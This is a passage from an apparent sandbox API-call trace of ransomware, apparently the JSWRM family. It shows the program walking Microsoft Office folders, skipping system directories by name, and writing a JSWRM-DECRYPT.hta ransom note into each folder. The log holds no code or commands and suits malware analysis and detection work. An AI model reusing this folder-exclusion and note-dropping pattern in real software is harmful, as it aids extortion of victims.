dwFlags=0x0, lpWideCharStr="MSGR8EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.DLL", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8EN.DLL", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8EN.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.582] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd928f97c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b050, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8EN.DLL", cAlternateFileName="")) returned 0 [0139.582] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0139.583] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf31b5d3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0139.583] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="...") returned 1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="recovery") returned -1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="documents and settings") returned -1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="$RECYCLE.BIN") returned 1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="system volume information") returned -1 [0139.583] lstrcmpiW (lpString1="1036", lpString2="msocache") returned -1 [0139.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1036\\jswrm-decrypt.hta")) returned 0xffffffff [0139.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1036\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.584] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.584] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0139.585] CloseHandle (hObject=0x238) returned 1 [0139.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\1036\\jswrm-decrypt.hta")) returned 0x20 [0139.585] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\1036\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf31b5d3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0139.585] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0139.585] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf31b5d3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="..", cAlternateFileName="")) returned 1 [0139.585] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0139.585] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0139.585] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49dc6a98, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x49dc6a98, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0139.585] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0139.585] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0139.585] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0139.586] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.586] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf31b5d3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf31b5d3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafed902, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aab8, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8FR.DLL", cAlternateFileName="")) returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2=".") returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="..") returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="...") returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="windows") returned -1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="recovery") returned -1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="perflogs") returned -1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="documents and settings") returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="system volume information") returned -1 [0139.586] lstrcmpiW (lpString1="MSGR8FR.DLL", lpString2="msocache") returned -1 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.DLL", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8FR.DLL", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8FR.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.586] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf31b5d3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf31b5d3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafed902, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8aab8, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8FR.DLL", cAlternateFileName="")) returned 0 [0139.586] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0139.587] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe34d5ed4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0139.587] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="...") returned 1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="recovery") returned -1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="perflogs") returned -1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="documents and settings") returned -1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="$RECYCLE.BIN") returned 1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="system volume information") returned -1 [0139.587] lstrcmpiW (lpString1="3082", lpString2="msocache") returned -1 [0139.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\3082\\jswrm-decrypt.hta")) returned 0xffffffff [0139.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\3082\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.588] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.588] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0139.589] CloseHandle (hObject=0x238) returned 1 [0139.589] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\proof\\3082\\jswrm-decrypt.hta")) returned 0x20 [0139.589] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PROOF\\3082\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0139.589] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0139.589] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="..", cAlternateFileName="")) returned 1 [0139.590] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0139.590] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0139.590] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49dc6a98, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x49dc6a98, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x49dc6a98, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0139.590] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.590] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb039dcc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b050, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8ES.DLL", cAlternateFileName="")) returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2=".") returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="..") returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="...") returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="windows") returned -1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="recovery") returned -1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="perflogs") returned -1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="documents and settings") returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="system volume information") returned -1 [0139.590] lstrcmpiW (lpString1="MSGR8ES.DLL", lpString2="msocache") returned -1 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.DLL", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSGR8ES.DLL", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSGR8ES.DLL", lpUsedDefaultChar=0x0) returned 11 [0139.591] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe34d5ed4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34d5ed4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb039dcc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b050, dwReserved0=0x60002, dwReserved1=0x2256cc, cFileName="MSGR8ES.DLL", cAlternateFileName="")) returned 0 [0139.591] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0139.591] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49da092e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x49da092e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x49da092e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0139.591] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0139.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0139.591] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc52c782a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc52c782a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc52c782a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="msgr8en.dub", cAlternateFileName="")) returned 1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2=".") returned 1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="..") returned 1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="...") returned 1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="windows") returned -1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="recovery") returned -1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="perflogs") returned -1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="documents and settings") returned 1 [0139.591] lstrcmpiW (lpString1="msgr8en.dub", lpString2="$RECYCLE.BIN") returned 1 [0139.592] lstrcmpiW (lpString1="msgr8en.dub", 